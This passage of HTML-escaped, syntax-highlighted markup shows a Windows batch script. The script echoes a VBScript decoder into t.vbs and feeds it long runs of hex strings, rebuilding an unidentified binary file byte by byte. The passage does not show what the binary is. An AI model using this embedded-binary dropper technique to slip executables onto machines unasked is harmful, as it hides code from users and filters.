top;"&gt;"46911206CBE7488A8ACB488A40FE250F35139EE970D760E9C55BF997452AEDA0B7947E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A76E7B7605821CC37878E0949B85808132DB68580AA864A2153C86EA14079FEAF30327"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7A59701E807B7642C1F21D0E7376108791F0F3E83072CF6F714E120A48C735289BBEC2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D7A160E1F631D3F118397DDE004B7C6DA418F8B6C81107A82762FD81706F7D3F1E91DC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"09F2AC2EEE67D2294AE0736E4EA00F0166F8909A0C6BBF10CF1758FA01604F082E58AC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B15CC06239149BBEA68AAA2D6C10490750B8C1020C81F9B367C578467B1503E1F99E60"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C0826BEC47E751CF17811BDB7397E8BB839F743940F1681B4439E0A435AF0DC0B7180C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FCBD67BCBB3BF49475BF35D4C01FFA4EAC7A18DD76281F43FBD3D82F618340A97BC0BD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E9757D2DA1A8DC3E4C1A20CC5C6C03A38B6E7702FF37F4084205B617F2EF4EF1D2A35B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"82522CB65388EDC281563D1FA2BB489BAEC462DB5571489C4C711F13C815F7BA653DCF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"63E7AF9574E80960C65C9BA402BB12D93BCB5FB6945E169F43E2A1D2412EF761211215"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"95F816C75A8C0DF94FC438BB08A002CC295E984C28A829B7A4A704E3CBEB41FF020196"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7AA17F8F85DD78A2788B2CC4C086F2BB61A58006F2C8E8C60AE8201FC93670F9CA382A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4C285B09D81E2659C22A4EEAF89333638100FB2603DDC23FD375967C46CB1F4FF6D20E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5F281C6E3F79B83D1ECDEF7908C61EE9F206566DF6A283A40EC1D6519E1A68F2599467"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1D46E30D69DE7D6863B2E74EFA346A0915CA71277B11E7671BF2737FFD030BBEE05390"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B30ADCE2D60D755067097DA8C8317A76F6A7A867CBCA696CFFEB2544529827A6D7F347"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9241272613E42DF9A3DC2D51AFD313FCC231884C15CDF4FD0588FA2E299A1FA38FB495"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A2D4C2FCF8B7C5E72BA1F4997DCFFDF436049EF286F3AEF668F0EF84D6FC2E98613E97"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"DF1787EF5E223FD8409550C00543F54DC30EC89608B01A2621D5D516A0E71F3E4F835E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D0EA18ABC95DED60D964F6BF791EBB5677AB4EE26C3D53D1559B349A12BE730272F2B3"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B37B537C4AAF68FE9B6F6E2FD2F946E07C9F141F2F5841A728DD99EE2D523EE20C2A67"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"80ADE91CA6823809DCF969CD0DD25B49FC15AB6C39BFE70B248D3B981DF1BF2B7C0ADF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6342CF0EDB5A27F00F890DF3A5CCF1D65C093E561652F9FE735029A0CE5216985AF356"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"07E88506297F066A85546F48B2149FAD5D67D2638F8AB49C323277011321FAB08A3DC0"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1BE6D79DA0DC9B600DE1BF3A0EC0E418B5E9A134748EA204AB32A3E554438CAB7DBE2B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9330115C7EB7D795436FCFC86F3B833EB3FED7ECE7884FF609713BC477DE909E82BCC6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"598EA25B1EE02C0C527F61C88DE17AAFD8E92DDC2F52B5B9D941DC44B74A6E6E873018"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"16870950AA398784D79C653468B6C0354CA3F1329309F17D91669FE37D9381AF57A02B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8161E622F128233D763893FE4EB59A460581C3C7427BDA51E1B585EAA11F3F70D2BBF3"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C17CA5C7810DBC82FA976C187D8FE6A1CF804A87F1E470ABAE576F699E8CB1793F7F96"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FA7ACC6990946CC4F51F9F83540E5CD2F5E15A0653DE38D4D046371D76297617062876"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9312BD250DFA5AB30DFC8EB3D41AE38694F799543FFF1085C78683BB97BF8F0FD0209D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"EC6FA9718F88058826DCF85BD4898B44EA9C4D111B383DA235142DB7083E5F6F1A36B7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4AF6CEC71011BBE94ED3288D4B4191452B07E18AC1ADE321EC2BE6ABB9C86E7041E20F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8286A9764714C202617E4D9BE0E651A7701CA4362F300CA2FB1024D6F12EBA117C890D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A738D80174CF63D4C44008356489A6D41934F2AF9C111D8E68980115B64D1FA3B0E1DE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CB10941EF282615E37BAF1E959B792BE8E05A384F10EDFBD2710E2B7E8443CD6874E04"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C4B7460A5629CEFF14FACAD71E76EC8DF58F1FDDA583AA013188344210C994A84B2398"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A5EAD228A6405D3A935DC2FFC72774414CB76CC591127024BE0690B56C417573C2338F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F71C1577AFD1E3866077B14617B179E6E81891FFE3C7A894283251842B8EBAB30DD8CA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C8A2F9F8EFC59D73E6B491FF76488C4967E2E645542BCA79849E7FF17B0AFE4D15DDD4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7397E2FB598AFB1240423D81D44CCB5BE54DDC746B4036A8C43237AB7404719BA4A868"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; 